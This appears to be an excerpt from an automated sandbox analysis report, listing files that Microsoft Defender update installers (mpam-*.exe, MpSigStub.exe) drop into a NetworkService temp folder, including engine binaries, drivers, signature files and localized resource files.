Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\zh-TW\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\es-ES\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\mpasbase.vdm Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\te-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\de-DE\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpDlpCmd.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ar-SA\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ko-KR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\nb-NO\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\bg-BG\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\fa-IR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\pl-PL\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\pt-BR\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\da-DK\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\en-US\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MsMpEng.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\es-ES\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\pl-PL\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sr-Cyrl-RS\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpCmdRun.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\mr-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\da-DK\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\am-ET\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\fr-CA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\endpointdlp.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\et-EE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ja-JP\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpCopyAccelerator.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\tr-TR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\es-MX\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sl-SI\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\bn-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\nl-NL\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\as-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\bg-BG\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\bs-Latn-BA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\zh-CN\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\en-GB\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\lv-LV\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\fr-FR\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\id-ID\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\hu-HU\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\quz-PE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\x86\MpCopyAccelerator.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sv-SE\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpEvMsg.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\mk-MK\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\et-EE\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\x86\MpCmdRun.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ru-RU\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\cs-CZ\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\it-IT\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\gd-GB\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\hu-HU\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ca-ES\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ConfigSecurityPolicy.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpDetours.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sr-Cyrl-BA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\de-DE\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sv-SE\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\es-ES\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\mt-MT\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\zh-CN\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\cy-GB\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\hi-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\af-ZA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\fi-FI\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\id-ID\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpUxAgent.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\pa-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ne-NP\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ko-KR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\th-TH\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\lt-LT\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\fi-FI\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\lt-LT\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\fr-FR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ml-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sr-Latn-RS\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Drivers\WdDevFlt.sys Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\it-IT\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ur-PK\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpRtp.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\az-Latn-AZ\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Drivers\WdNisDrv.sys Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\el-GR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\zh-TW\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sr-Latn-RS\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\th-TH\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpAsDesc.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\he-IL\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ru-RU\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ca-ES-valencia\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ro-RO\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\kk-KZ\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ja-JP\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\uk-UA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ca-ES\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ar-SA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\x86\MpOAV.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\zh-TW\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\zh-TW\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\fr-FR\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\fil-PH\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sq-AL\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\mpasdlta.vdm Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ga-IE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Drivers\WdFilter.sys Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\de-DE\ProtectionManagement.dll.mui Jump to dropped file
